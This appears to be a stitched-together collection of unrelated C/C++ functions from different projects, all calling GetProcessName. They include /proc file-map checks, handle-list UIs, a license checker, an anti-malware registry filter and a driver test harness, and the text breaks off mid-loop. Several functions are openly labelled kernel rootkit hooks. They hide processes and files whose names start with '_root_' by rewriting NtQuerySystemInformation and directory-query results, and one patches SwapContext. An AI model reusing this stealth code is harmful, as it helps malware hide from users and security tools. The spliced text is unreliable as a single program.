static boolean CheckFileMaps(int pid, const char* mountPoint)
{
FILE* file;
char buffer[PATH_MAX + 100];
boolean mapOpen = false;
sprintf(buffer, "/proc/%d/maps", pid);
file = fopen(buffer, "r");
if (!file)
return false;
while (!mapOpen && fgets(buffer, sizeof(buffer), file))
{
// skip to the path
const char* path = strchr(buffer, '/');
if (path && PathMatchesMountPoint(path, mountPoint))
{
char name[PATH_MAX];
GetProcessName(pid, name);
LOG_ERROR("process %s (%d) has open file map for %s\n", name, pid, path);
mapOpen = true;
}
}
fclose(file);
return mapOpen;
}
/* _________________________________________________________
. usually no object attributes - just a hSection pointer.
. _________________________________________________________ */
NTSTATUS NewNtCreateProcess(
OUT PHANDLE phProcess,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN HANDLE hParentProcess,
IN BOOLEAN bInheritParentHandles,
IN HANDLE hSection OPTIONAL,
IN HANDLE hDebugPort OPTIONAL,
IN HANDLE hExceptionPort OPTIONAL)
{
int rc;
char ParentDirectory[1024];
PUNICODE_STRING Parent=NULL;
CHAR aProcessName[PROCNAMELEN];
GetProcessName( aProcessName );
DbgPrint("rootkit: NewNtCreateProcess() from %s\n", aProcessName);
DumpObjectAttributes(ObjectAttributes);
if(hSection) DbgPrint("rootkit: launching NtCreateProcess w/ hSection 0x%X\n", hSection);
rc=((NTCREATEPROCESS)(OldNtCreateProcess)) (
phProcess,
DesiredAccess,
ObjectAttributes,
hParentProcess,
bInheritParentHandles,
hSection,
hDebugPort,
hExceptionPort);
if(phProcess) DbgPrint("rootkit: phProcess 0x%X\n", *phProcess);
DbgPrint("rootkit: NtCreateProcess : rc = %x\n", rc);
return rc;
}
std::wstring ProcessInfo::GetProcessNameByPid(DWORD processId)
{
Handle hProcess(::OpenProcess(PROCESS_QUERY_INFORMATION, false, processId));
if (hProcess)
return GetProcessName(hProcess.get());
return L"";
}
NTSTATUS NewZwCreateSection (
OUT PHANDLE phSection,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PLARGE_INTEGER MaximumSize OPTIONAL,
IN ULONG SectionPageProtection,
IN ULONG AllocationAttributes,
IN HANDLE hFile OPTIONAL
)
{
int rc;
CHAR aProcessName[PROCNAMELEN];
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwCreateSection() from %s\n", aProcessName);
DumpObjectAttributes(ObjectAttributes);
if(AllocationAttributes & SEC_FILE)
DbgPrint("AllocationAttributes & SEC_FILE\n");
if(AllocationAttributes & SEC_IMAGE)
DbgPrint("AllocationAttributes & SEC_IMAGE\n");
if(AllocationAttributes & SEC_RESERVE)
DbgPrint("AllocationAttributes & SEC_RESERVE\n");
if(AllocationAttributes & SEC_COMMIT)
DbgPrint("AllocationAttributes & SEC_COMMIT\n");
if(AllocationAttributes & SEC_NOCACHE)
DbgPrint("AllocationAttributes & SEC_NOCACHE\n");
DbgPrint("ZwCreateSection hFile == 0x%X\n", hFile);
#if 1
if(hFile)
{
HANDLE newFileH = CheckForRedirectedFile( hFile );
if(newFileH){
hFile = newFileH;
}
}
#endif
rc=((ZWCREATESECTION)(OldZwCreateSection)) (
phSection,
DesiredAccess,
ObjectAttributes,
MaximumSize,
SectionPageProtection,
AllocationAttributes,
hFile);
if(phSection)
{
DbgPrint("section handle 0x%X\n", *phSection);
}
DbgPrint("rootkit: ZwCreateSection : rc = %x\n", rc);
return rc;
}
NTSTATUS
RegProc_EnumValueKey( HANDLE hKey,
PVOID pRootObject,
KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
PVOID pKeyValueInformation,
ULONG Length,
PULONG pResultLength )
{
ULONG ulLength = 0;
NAME_BUFFER RegPath = {0};
NTSTATUS Status = STATUS_SUCCESS;
WCHAR wzProcName[ MAX_PROCESS_LEN ] = L"";
if(!hKey && !pRootObject) return Status;
if(ExGetPreviousMode() == KernelMode) return Status;
if(KeGetCurrentIrql() >= DISPATCH_LEVEL) return Status;
if (FALSE == g_MalwFind.DrvConfig.bGlobalCtrl)
{
return Status;
}
RtlZeroMemory( wzProcName, sizeof(WCHAR)*MAX_PROCESS_LEN );
GetProcessName( PsGetCurrentProcess(), wzProcName, MAX_PROCESS_LEN );
// 전역기능 예외 프로세스 판단.
if(ISExpProcList_PolicyAll( wzProcName ))
{
return Status;
}
ALLOCATE_N_REG_POOL( RegPath );
if(!RegPath.pBuffer) return Status;
SET_REG_POOL_ZERO( RegPath );
ulLength = GetRegFullPath( hKey, pRootObject, NULL, &RegPath );
if(ulLength <= 0)
{
FREE_N_REG_POOL( RegPath );
return STATUS_SUCCESS;
}
if(KeyValueInformationClass == KeyValueBasicInformation)
{
}
else if(KeyValueInformationClass == KeyValueFullInformation)
{
}
else if(KeyValueInformationClass == KeyValuePartialInformation)
{
}
FREE_N_REG_POOL( RegPath );
return Status;
}
/* ________________________________________________
. watch thread creation
. ________________________________________________ */
NTSTATUS NewZwCreateThread(
OUT PHANDLE phThread,
IN ACCESS_MASK AccessMask,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN HANDLE hProcess,
OUT PCLIENT_ID pClientId,
IN PCONTEXT pContext,
OUT PSTACKINFO pStackInfo,
IN BOOLEAN bSuspended
)
{
int rc;
STACKINFO StackInfo;
CHAR aProcessName[PROCNAMELEN];
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwCreateThread() from %s\n", aProcessName);
DumpObjectAttributes(ObjectAttributes);
if(bSuspended) DbgPrint("create suspended\n");
DumpContext(pContext);
/* dump stack info */
if(pStackInfo)
{
DbgPrint("StackInfo.TopOfStack=0x%X\n", pStackInfo->TopOfStack);
DbgPrint("StackInfo.BottomOfStack=0x%X\n", pStackInfo->BottomOfStack);
DbgPrint("StackInfo.OnePageBelowTopOfStack=0x%X\n", pStackInfo->OnePageBelowTopOfStack);
}
DbgPrint("parent process 0x%X\n", hProcess);
rc = ((ZWCREATETHREAD)(OldZwCreateThread)) (
phThread,
AccessMask,
ObjectAttributes,
hProcess,
pClientId,
pContext,
pStackInfo,
bSuspended
);
if(phThread) DbgPrint("thread handle 0x%X\n", *phThread);
DbgPrint("ZwCreateThread : rc = %x\n", rc);
DumpContext(pContext);
return rc;
}
NTSTATUS
RegProc_DeleteKey( HANDLE hKey, PVOID pRootObject, PUNICODE_STRING pSubKey )
{
ULONG ulLength = 0;
NAME_BUFFER RegPath = {0};
NTSTATUS Status = STATUS_SUCCESS;
WCHAR wzProcName[ MAX_PROCESS_LEN ] = L"";
if(!hKey && !pRootObject) return Status;
if(ExGetPreviousMode() == KernelMode) return Status;
if(KeGetCurrentIrql() >= DISPATCH_LEVEL) return Status;
if (FALSE == g_MalwFind.DrvConfig.bGlobalCtrl)
{
return Status;
}
RtlZeroMemory( wzProcName, sizeof(WCHAR)*MAX_PROCESS_LEN );
GetProcessName( PsGetCurrentProcess(), wzProcName, MAX_PROCESS_LEN );
// 전역기능 예외프로세스 판단.
if(ISExpProcList_PolicyAll( wzProcName ))
{
return Status;
}
ALLOCATE_N_REG_POOL( RegPath );
if(!RegPath.pBuffer) return Status;
SET_REG_POOL_ZERO( RegPath );
ulLength = GetRegFullPath( hKey, pRootObject, pSubKey, &RegPath );
if(ulLength <= 0)
{
FREE_N_REG_POOL( RegPath );
return STATUS_SUCCESS;
}
_wcslwr( RegPath.pBuffer );
if( wcsstr(RegPath.pBuffer, SVCNAME_AGENT) || wcsstr(RegPath.pBuffer, SVCNAME_DRIVER) )
{
KdPrint(("RegProc_DeleteKey=[%ws] \n", RegPath.pBuffer ));
// SetupDir Control == FALSE:제어안함 TRUE: 제어함
if (g_MalwFind.DrvConfig.bGlobalCtrl)
{
Status = STATUS_ACCESS_DENIED;
KdPrint(("Ret--STATUS_ACCESS_DENIED RegPath=%ws \n", RegPath.pBuffer));
}
}
FREE_N_REG_POOL( RegPath );
return Status;
}
int
kill(pid_t pid, int sig)
{
HANDLE hProcess;
char MyProcessName[MAX_PATH];
char ProcessNameToCheck[MAX_PATH];
if (sig == 0) {
if ((hProcess = OpenProcess(PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE, pid)) == NULL)
return -1;
else {
CloseHandle(hProcess);
GetProcessName(getpid(), MyProcessName);
GetProcessName(pid, ProcessNameToCheck);
if (strcmp(MyProcessName, ProcessNameToCheck) == 0)
return 0;
return -1;
}
} else
return 0;
}
int SystemHandleInformation::HANDLE_INFORMATION::Insert( CSystemInfoListCtrl& list, BOOL bPid,
size_t iItem, size_t iItemCount) const
{
iItem; // use var
iItemCount; // use var
CString strPID, strProcesName;
CString strHandle, strAccess, strType, strTypeNum, strName;
strHandle.Format(_T("0x%08IX"), sh.HandleValue);
strAccess.Format( _T("0x%08X"), sh.GrantedAccess );
SystemHandleInformation::GetTypeToken(sh.HandleValue, strType, sh.GetPid());
SystemHandleInformation::GetName(sh.HandleValue, strName, sh.GetPid());
const DWORD typeFlags = 0; // In fact I don't know what it means in Windows internals
strTypeNum.Format(_T("%d"), sh.ObjectTypeIndex);
if( typeFlags != 0 )
{
CString d;
d.Format( _T("0x%X | "), typeFlags );
strTypeNum = d + strTypeNum;
}
int sub = 0;
int iListItemCount = list.GetItemCount();
int nPos = list.InsertItem( iListItemCount, _T("") );
list.SetItemText( nPos, sub+0, strHandle );
if( bPid )
{
strPID.Format( _T("%d"), sh.GetPid() );
list.SetItemText( nPos, sub+1, strPID );
sub++;
strProcesName = GetProcessName(sh.GetPid());
list.SetItemText( nPos, sub+1, strProcesName );
sub++;
}
list.SetItemText( nPos, sub+1, strAccess );
list.SetItemText( nPos, sub+2, strType );
list.SetItemText( nPos, sub+3, strTypeNum );
list.SetItemText( nPos, sub+4, strName );
return nPos;
}
static boolean CheckSymLink(int pid, const char* mountPoint, const char* name, const char* message)
{
char path[PATH_MAX];
char link[PATH_MAX];
sprintf(path, "/proc/%d/%s", pid, name);
if (ReadSymLink(path, link) && PathMatchesMountPoint(link, mountPoint))
{
char name[PATH_MAX];
GetProcessName(pid, name);
LOG_ERROR("process %s (%d) has %s in %s\n", name, pid, message, mountPoint);
return true;
}
else
return false;
}
Menu* MakeProcessesMenu(bool popup)
{
DWORD ph[1024];
DWORD phs;
if(!EnumProcesses(ph, 1024, &phs)) phs=0;
phs/=sizeof(DWORD);
char buff[128];
sprintf(buff, "Process Killer Menu - %ld", phs);
Menu *m = MakeNamedMenu(buff, "IDRoot_processes", popup);
for (int i=phs-1; i>=0; i--){
char name[128], buf[80];
if (GetProcessName(ph[i], name)){
sprintf(buf, "@KillProcess %ld", ph[i]);
MakeMenuItem(m, name, buf, false);
}
}
return m;
}
//发送对手进程名数据至服务器
void CProcessReport::OnProcessReport()
{
std::wstring strRunProcName = GetProcessName(); //查询获取正在运行的对手进程名
if(strRunProcName == _T(""))
{
return;
}
//上传对手进程名数据至服务器
core::ReportCollectInfoEvent *runProcEvent = new core::ReportCollectInfoEvent();
core::ReportCollectInfoEvent::Key2Value runProc;
runProc.key = COLLECT_INFO_PROCESS;
runProc.value = strRunProcName;
runProcEvent->vecCollecInfo.push_back(runProc);
Event _event = MakeEvent<MODULE_ID_HALL>()(core::EVENT_VALUE_CORE_REPORT_COLLECT_INFO,
MODULE_ID_CORE,0,0,0,runProcEvent);
g_HallModule->m_pModuleManager->PushEvent(_event);
}
int SystemHandleInformation::HANDLE_INFORMATION::InsertFile( CSystemInfoListCtrl& list, BOOL bPid,
size_t iItem, size_t iItemCount, LPCTSTR szDevice, LPCTSTR szPath) const
{
iItem; // use var
iItemCount; // use var
CString strPID, strProcesName;
CString strHandle, strName, strPath, strDevice;
strHandle.Format(_T("0x%08IX"), sh.HandleValue);
strPath = szPath;
strDevice = szDevice;
int pos = strDevice.ReverseFind( _T('\\') );
strName = strDevice.Mid( pos + 1 );
int sub = 0;
int iListItemCount = list.GetItemCount();
int nPos = list.InsertItem( iListItemCount, _T("") );
list.SetItemText( nPos, sub+0, strHandle );
if( bPid )
{
strPID.Format(_T("%d"), sh.GetPid());
list.SetItemText( nPos, sub+1, strPID );
sub++;
strProcesName = GetProcessName(sh.GetPid());
list.SetItemText( nPos, sub+1, strProcesName );
sub++;
}
list.SetItemText( nPos, sub+1, strName );
list.SetItemText( nPos, sub+2, strPath );
list.SetItemText( nPos, sub+3, strDevice );
return nPos;
}
bool bCheck(CString strName, CString strKey, CString strLicense)
{
bool bRet = false;
CRC4_ rc;
rc.put_Key(_T("a4b3c0d6e8f1a1b9c8d3e1f0a2b8c1d4e1f6a"));
// CString str = rc.Crypt2(_T("国家开发银行-20090701"));
// CString strMW = rc.Crypt(_T("思博智创-20090701"));
TCHAR szExe[MAX_PATH] = {0};
TCHAR szCompany[MAX_PATH] = {0};
TCHAR szExpriseDate[MAX_PATH] = {0};
CString strDe = rc.Crypt2(strLicense);
//int iPos = strDe.ReverseFind(_T('-'));
//CString strLeft = strDe.Left(iPos);
//CString strRight = strDe.Mid(iPos+1);
_stscanf(strDe.GetBuffer(),_T("%s %s %s"),szExe,szCompany,szExpriseDate);
CString strExe = GetProcessName();
if (strExe.CompareNoCase(szExe) == 0)
{
if (strName.CompareNoCase(szCompany) == 0)
{
SYSTEMTIME ti = {0};
::GetSystemTime(&ti);
CString strSysTime;
strSysTime.Format(_T("%04d%02d%02d"),ti.wYear,ti.wMonth,ti.wDay);
CString strTime(szExpriseDate);
if (strSysTime<strTime)
{
bRet = true;
}
}
}
return bRet;
}
void GetProcessNameList( ProcessNameList *Ret )
{
HANDLE hProcessSnap;
PROCESSENTRY32 pe32;
// Take a snapshot of all processes in the system.
hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
// printf( TEXT("CreateToolhelp32Snapshot (of processes)") );
return;
}
// Set the size of the structure before using it.
pe32.dwSize = sizeof( PROCESSENTRY32 );
if( !Process32First( hProcessSnap, &pe32 ) )
{
// printf( TEXT("Process32First") ); // show cause of failure
CloseHandle( hProcessSnap ); // clean the snapshot object
return;
}
do
{
Ret->Count++;
char *Name = GetProcessName( pe32.th32ProcessID );
if( Name != NULL )
{
if( Name[0] == ' ' )
{
Ret->Names.push_back( _strdup( pe32.szExeFile ) );
free( Name );
}
else
Ret->Names.push_back( Name );
}
} while( Process32Next( hProcessSnap, &pe32 ) );
CloseHandle( hProcessSnap );
return;
}
static boolean CheckFileDescriptorSymLinks(int pid, const char* mountPoint)
{
DIR* dir;
struct dirent* de;
boolean fileOpen = false;
char path[PATH_MAX];
char link[PATH_MAX];
int parent_length;
// compute path to process's directory of open files
sprintf(path, "/proc/%d/fd", pid);
dir = opendir(path);
if (!dir)
return false;
// remember length of the path
parent_length = strlen(path);
// append a trailing '/'
path[parent_length++] = '/';
while ((de = readdir(dir)) != 0 && !fileOpen) {
if (!strcmp(de->d_name, ".") || !strcmp(de->d_name, ".."))
continue;
// append the file name, after truncating to parent directory
path[parent_length] = 0;
strcat(path, de->d_name);
if (ReadSymLink(path, link) && PathMatchesMountPoint(link, mountPoint))
{
char name[PATH_MAX];
GetProcessName(pid, name);
LOG_ERROR("process %s (%d) has open file %s\n", name, pid, link);
fileOpen = true;
}
}
closedir(dir);
return fileOpen;
}
void MakeFileNameByProcess(wchar_t* output, size_t cchOutput, HANDLE process, const wchar_t* destFolder, const wchar_t* prefix, const wchar_t* ext)
{
if (output != NULL && cchOutput > 0)
{
// 폴더 얻기
wchar_t tempDir[MAX_PATH] = { 0, };
if (destFolder != NULL)
{
::wcscpy_s(tempDir, _countof(tempDir), destFolder);
}
else // 폴더가 지정되지 않았다면 프로세스가 존재하는 폴더를 선택한다.
{
GetProcessFolder(process, tempDir, _countof(tempDir));
}
// 프로세스 이름 얻기
wchar_t processName[_MAX_FNAME] = { 0, };
GetProcessName(process, processName, _countof(processName));
MakeFileName(output, cchOutput, processName, tempDir, prefix, ext);
}
}
//__fastcall SwapContext(PKTHREAD CurrentThread,PKTHREAD NextThread)
__declspec(naked) void HooK(){
GetProcessName();
/*before jumping back execute the overwritten functions*/
//807e3900 cmp byte ptr [esi+39h],0
//7404 je nt!SwapContext+0xa (828bdaea)
__asm{
cmp byte ptr[esi+39h],0
/*je address , replaced in runtime*/
_emit 0x0F
_emit 0x84
_emit 0xAA
_emit 0xAA
_emit 0xAA
_emit 0xAA
/*jmp just after the patched bytes*/
_emit 0xE9
_emit 0xBB
_emit 0xBB
_emit 0xBB
_emit 0xBB
}
}
NTSTATUS NewZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
)
{
NTSTATUS rc;
CHAR aProcessName[PROCNAMELEN];
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwQuerySystemInformation() from %s\n", aProcessName);
rc = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength );
if( NT_SUCCESS( rc ) )
{
// double check the process name, if it starts w/ '_root_' DO NOT
// apply any stealth
if(0 == memcmp(aProcessName, "_root_", 6))
{
DbgPrint("rootkit: detected system query from _root_ process\n");
}
else if( 5 == SystemInformationClass )
{
// this is a process list, look for process names that start with
// '_root_'
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
while(curr)
{
//struct _SYSTEM_PROCESSES *next = ((char *)curr += curr->NextEntryDelta);
ANSI_STRING process_name;
RtlUnicodeStringToAnsiString( &process_name, &(curr->ProcessName), TRUE);
if( (0 < process_name.Length) && (255 > process_name.Length) )
{
if(0 == memcmp( process_name.Buffer, "_root_", 6))
{
//////////////////////////////////////////////
// we have a winner!
//////////////////////////////////////////////
char _output[255];
char _pname[255];
memset(_pname, 0, 255);
memcpy(_pname, process_name.Buffer, process_name.Length);
sprintf( _output,
"rootkit: hiding process, pid: %d\tname: %s\r\n",
curr->ProcessId,
_pname);
DbgPrint(_output);
if(prev)
{
if(curr->NextEntryDelta)
{
// make prev skip this entry
prev->NextEntryDelta += curr->NextEntryDelta;
}
else
{
// we are last, so make prev the end
prev->NextEntryDelta = 0;
}
}
else
{
if(curr->NextEntryDelta)
{
// we are first in the list, so move it forward
(char *)SystemInformation += curr->NextEntryDelta;
}
else
{
// we are the only process!
SystemInformation = NULL;
}
}
}
}
RtlFreeAnsiString(&process_name);
prev = curr;
if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
else curr = NULL;
}
}
}
return(rc);
}
NTSTATUS NewZwQueryDirectoryFile(
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery
)
{
NTSTATUS rc;
CHAR aProcessName[PROCNAMELEN];
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwQueryDirectoryFile() from %s\n", aProcessName);
rc=((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) (
hFile, /* this is the directory handle */
hEvent,
IoApcRoutine,
IoApcContext,
pIoStatusBlock,
FileInformationBuffer,
FileInformationBufferLength,
FileInfoClass,
bReturnOnlyOneEntry,
PathMask,
bRestartQuery);
if( NT_SUCCESS( rc ) &&
(FileInfoClass == FileDirectoryInformation ||
FileInfoClass == FileFullDirectoryInformation ||
FileInfoClass == FileIdFullDirectoryInformation ||
FileInfoClass == FileBothDirectoryInformation ||
FileInfoClass == FileIdBothDirectoryInformation ||
FileInfoClass == FileNamesInformation )
)
{
if(0 == memcmp(aProcessName, "_root_", 6))
{
DbgPrint("rootkit: detected file/directory query from _root_ process\n");
}
else
{
PVOID p = FileInformationBuffer;
PVOID pLast = NULL;
BOOL bLastOne;
do
{
bLastOne = !getDirEntryLenToNext(p,FileInfoClass);
// compare directory-name prefix with '_root_' to decide if to hide or not.
if (getDirEntryFileLength(p,FileInfoClass) >= 12) {
if( RtlCompareMemory( getDirEntryFileName(p,FileInfoClass), (PVOID)"_\0r\0o\0o\0t\0_\0", 12 ) == 12 )
{
if( bLastOne )
{
if( p == FileInformationBuffer ) rc = 0x80000006;
else setDirEntryLenToNext(pLast,FileInfoClass, 0);
break;
}
else
{
int iPos = ((ULONG)p) - (ULONG)FileInformationBuffer;
int iLeft = (DWORD)FileInformationBufferLength - iPos - getDirEntryLenToNext(p,FileInfoClass);
RtlCopyMemory( p, (PVOID)( (char *)p + getDirEntryLenToNext(p,FileInfoClass) ), (DWORD)iLeft );
continue;
}
}
}
pLast = p;
p = ((char *)p + getDirEntryLenToNext(p,FileInfoClass) );
} while( !bLastOne );
}
}
return(rc);
}
//+ ----------------------------------------------------------------------------------------
int main(int argc, char* argv[])
{
BYTE* pEvt;
gpModuleName = GetProcessName(gModuleName, sizeof(gModuleName));
if (gpModuleName == NULL)
return -1;
HANDLE hEventAppear = CreateEvent(NULL, FALSE, FALSE, NULL);
if (hEventAppear == NULL)
return -2;
//+ ----------------------------------------------------------------------------------------
//+ system test
#ifdef _check_system
Log.AddToLog(L"Starting system interceptor check...\n");
{
CheckJob_System SystemJob(&gDrvEventList);
if (false == SystemJob.Start())
{
Log.AddToLog(L"Can't start check system !");
gDrvEventList.SetError(_ERR_DRVFAULT);
}
else
{
SystemJob.ChangeActiveStatus(true);
//+ ----------------------------------------------------------------------------------------
//+ open process
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
if (hProcess != NULL)
{
Log.AddToLog(L"protection fault - process opened!");
gDrvEventList.SetError(_ERR_DRVFAULT);
CloseHandle(hProcess);
}
//+ ----------------------------------------------------------------------------------------
//+ create process (ex)
PROCESS_INFORMATION pi;
STARTUPINFO si;
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
WCHAR cmdline[1024];
if (!ExpandEnvironmentStrings(L"\"%ComSpec%\" /C echo app launched!", cmdline, sizeof(cmdline)))
gDrvEventList.SetError(_ERR_INTERNAL);
else
{
if (CreateProcess(NULL, cmdline, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi))
{
Log.AddToLog(L"protection fault - process started!");
gDrvEventList.SetError(_ERR_DRVFAULT);
WaitForSingleObject(pi.hProcess,INFINITE);
}
}
//+ ----------------------------------------------------------------------------------------
//+ terminate process
TerminateProcess((HANDLE) -1, -2);
SystemJob.ChangeActiveStatus(false);
}
while ((pEvt = gDrvEventList.GetFirst()) != NULL)
{
Log.AddToLog((PEVENT_TRANSMIT) pEvt);
gDrvEventList.Free(pEvt);
}
}
#endif
//- end system test
//- ----------------------------------------------------------------------------------------
//+ ----------------------------------------------------------------------------------------
//+ file test
#ifdef _check_file
Log.AddToLog(L"Starting file interceptor check...\n");
{
CheckJob_File FileJob(&gDrvEventList);
if (false == FileJob.Start())
{
Log.AddToLog(L"Can't start check file interceptor!");
gDrvEventList.SetError(_ERR_DRVFAULT);
}
else
{
FileJob.SetAllowEvents(true);
FileJob.ChangeActiveStatus(true);
#define _testfilename L"TestFile.tst"
#define _testfilename_renamed L"TestFile renamed.tst"
#define _testfilename_create L"TestFile check create.tst"
HANDLE hTestFile = CreateFile(_testfilename, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hTestFile == INVALID_HANDLE_VALUE)
{
FileJob.ChangeActiveStatus(false);
Log.AddToLog(L"Can't create file TestFile.tst for test");
gDrvEventList.SetError(_ERR_DRVFAULT);
FileJob.ChangeActiveStatus(true);
}
else
{
DWORD dwBytes;
BYTE buf[1024];
ZeroMemory(buf, sizeof(buf));
WriteFile(hTestFile, buf, sizeof(buf), &dwBytes, NULL);
if (dwBytes != sizeof(buf))
{
Log.AddToLog(L"!Write to TestFile.tst failed");
gDrvEventList.SetError(_ERR_INTERNAL);
}
FlushFileBuffers(hTestFile);
SetFilePointer(hTestFile, 0, NULL, FILE_BEGIN);
ReadFile(hTestFile, buf, sizeof(buf), &dwBytes, NULL);
if (dwBytes != sizeof(buf))
{
Log.AddToLog(L"!Read from TestFile.tst failed");
gDrvEventList.SetError(_ERR_INTERNAL);
}
CloseHandle(hTestFile);
MoveFile(_testfilename, _testfilename_renamed);
DeleteFile(_testfilename_renamed);
// check deny create file
FileJob.SetAllowEvents(false);
hTestFile = CreateFile(_testfilename_create, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_TEMPORARY | FILE_FLAG_DELETE_ON_CLOSE, NULL);
if (hTestFile != INVALID_HANDLE_VALUE)
{
Log.AddToLog(L"protection fault - file "_testfilename_create L" opened");
gDrvEventList.SetError(_ERR_DRVFAULT);
CloseHandle(hTestFile);
}
}
FileJob.ChangeActiveStatus(false);
Sleep(100);
}
while ((pEvt = gDrvEventList.GetFirst()) != NULL)
{
Log.AddToLog((PEVENT_TRANSMIT) pEvt);
gDrvEventList.Free(pEvt);
}
}
#endif
//- end files test
//- ----------------------------------------------------------------------------------------
//+ ----------------------------------------------------------------------------------------
//+ registry
#ifdef _check_regestry
Log.AddToLog(L"Starting registry interceptor check...\n");
{
CheckJob_Reg RegJob(&gDrvEventList);
if (false == RegJob.Start())
{
Log.AddToLog(L"Can't start check file interceptor!");
gDrvEventList.SetError(_ERR_DRVFAULT);
}
else
{
RegJob.SetAllowEvents(true);
RegJob.ChangeActiveStatus(true);
HKEY hKey = NULL;
if (ERROR_SUCCESS == RegOpenKey(HKEY_CURRENT_USER, L"Software", &hKey))
{
DWORD type;
DWORD cbData = 0;
RegQueryValueEx(hKey, NULL, 0, &type, NULL, &cbData);
RegCloseKey(hKey);
//+ ----------------------------------------------------------------------------------------
//+ enum
{
HKEY hKey;
if(ERROR_SUCCESS == RegOpenKey(HKEY_CURRENT_USER, L"SOFTWARE", &hKey))
{
TCHAR SubkeyName[512];
DWORD dwSubkeyName = sizeof(SubkeyName);
DWORD dwIndex = 0;
if (RegEnumKey(hKey, dwIndex, SubkeyName, dwSubkeyName) == ERROR_SUCCESS)
{
// empty if
}
RegCloseKey(hKey);
}
}
//+ ----------------------------------------------------------------------------------------
}
RegJob.ChangeActiveStatus(false);
}
while ((pEvt = gDrvEventList.GetFirst()) != NULL)
{
Log.AddToLog((PEVENT_TRANSMIT) pEvt);
gDrvEventList.Free(pEvt);
}
}
#endif
//- end registry test
//- ----------------------------------------------------------------------------------------
//+ ----------------------------------------------------------------------------------------
//+ filter's queue - add (top, bottom, position), enumerate, /*find*/, enable, disable, delete, reset
#ifdef _check_flt
Log.AddToLog(L"Starting check filtering system\n");
{
CheckJob_Flt FltJob(&gDrvEventList, hEventAppear);
if (false == FltJob.Start())
{
Log.AddToLog(L"Can't start check filtering system!");
gDrvEventList.SetError(_ERR_DRVFAULT);
}
else
{
VERDICT Verdict;
byte SinglEevent[512];
PFILTER_EVENT_PARAM pSignleEvt = (PFILTER_EVENT_PARAM) SinglEevent;
ZeroMemory(SinglEevent, sizeof(SinglEevent));
pSignleEvt->HookID = FLTTYPE_FLT;
pSignleEvt->FunctionMj = 0;
pSignleEvt->FunctionMi = 0;
pSignleEvt->ParamsCount = 1;
pSignleEvt->ProcessingType = PreProcessing;
PSINGLE_PARAM pSingleParam = (PSINGLE_PARAM) pSignleEvt->Params;
BYTE FltTransmit[4095];
PFILTER_TRANSMIT pFlt = (PFILTER_TRANSMIT) FltTransmit;
ZeroMemory(FltTransmit, sizeof(FltTransmit));
FltJob.SetAllowEvents(true);
if (false == FltJob.ChangeActiveStatus(true))
{
Log.AddToLog(L"Can't activate check filtering system!");
gDrvEventList.SetError(_ERR_DRVFAULT);
}
else
{
Log.AddToLog(L"check filter's order...");
ULONG FltArr[4] = {0};
FltArr[1] = AddFSFilter2(FltJob.m_hDevice, FltJob.m_AppID, gpModuleName, 5, FLT_A_DEFAULT,
FLTTYPE_FLT, 0, 0, 0, PreProcessing, NULL, NULL);
FltArr[3] = AddFSFilter2(FltJob.m_hDevice, FltJob.m_AppID, gpModuleName, 5, FLT_A_DEFAULT,
FLTTYPE_FLT, 0, 0, 0, PreProcessing, NULL, NULL);
if (!FltArr[1] || !FltArr[3])
{
Log.AddToLog(L"Add filter to FLTTYPE_FLT failed!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
else
{
DWORD site = 0;
FltArr[0] = AddFSFilter2(FltJob.m_hDevice, FltJob.m_AppID, gpModuleName, 5, FLT_A_DEFAULT,
FLTTYPE_FLT, 0, 0, 0, PreProcessing, &site, NULL);
site = FltArr[1];
FltArr[2] = AddFSFilter2(FltJob.m_hDevice, FltJob.m_AppID, gpModuleName, 5, FLT_A_DEFAULT,
FLTTYPE_FLT, 0, 0, 0, PreProcessing, &site, NULL);
}
if (!FltArr[0] || !FltArr[2])
{
Log.AddToLog(L"Add filter to FLTTYPE_FLT failed!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
else
{
pFlt->m_AppID = FltJob.m_AppID;
pFlt->m_FltCtl = FLTCTL_FIRST;
if (FALSE == IDriverFilterTransmit(FltJob.m_hDevice, pFlt, pFlt, sizeof(FltTransmit), sizeof(FltTransmit)))
{
Log.AddToLog(L"Enumerating filter's failed!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
else
{
int ienum = 0;
pFlt->m_FltCtl = FLTCTL_NEXT;
do
{
